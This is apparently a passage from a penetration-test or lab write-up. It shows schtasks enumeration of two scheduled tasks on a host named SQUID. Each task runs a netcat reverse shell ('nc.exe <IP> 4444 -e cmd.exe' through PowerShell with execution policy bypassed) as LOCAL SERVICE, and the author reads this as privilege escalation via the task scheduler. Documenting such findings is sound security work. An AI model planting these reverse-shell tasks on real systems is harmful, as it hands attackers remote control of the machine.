Scheduled Tasks
2 none default scheduled tasks have been identified
\PermTask
PS C:\wamp\www> cmd /c schtasks /QUERY /TN \PermTask /V /FO LIST
Folder: \
HostName: SQUID
TaskName: \PermTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 3/23/2022 6:29:28 AM
Last Result: 1
Author: N/A
Task To Run: powershell.exe -Exec Bypass -Command "C:\wampp\nc.exe 192.168.118.23 4444 -e cmd.exe"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A\
PS C:\wamp\www> cmd /c schtasks /QUERY /TN \SomeTask /V /FO LIST
Folder: \
HostName: SQUID
TaskName: \SomeTask
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 3/23/2022 6:27:59 AM
Last Result: 1
Author: N/A
Task To Run: powershell.exe -Exec Bypass -Command "C:\wampp\nc.exe 192.168.100.23 4444 -e cmd.exe"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/ABoth \PermTask and \SomeTask tasks execute a reverse shell as the local service account
The presence of those tasks strongly suggest the attempt of the privilege recovery via task scheduler